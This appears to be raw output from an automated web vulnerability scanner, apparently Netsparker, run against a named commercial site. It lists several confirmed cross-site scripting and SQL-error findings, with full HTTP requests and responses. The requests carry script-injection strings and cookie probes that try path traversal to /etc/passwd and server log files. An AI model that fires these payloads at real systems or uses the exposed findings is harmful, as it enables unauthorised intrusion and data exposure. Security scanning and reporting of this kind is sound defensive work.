select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/

/ppc/leadflow/obtm00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/?'"--></style></script><script>alert(0x0005D6)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005D6)</script>

Request

GET /ppc/leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=avctbj9e1hir149buclu4jcbg3; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>' OR prj.project_page_url = 'leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D6)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005D4)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/bulo00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D4)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=k0ep4v4j0hai0cjhcskrmq96s7; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='"--></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D4)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET '"--></style></script><script>alert(0x0005D7)</script>

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D7)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
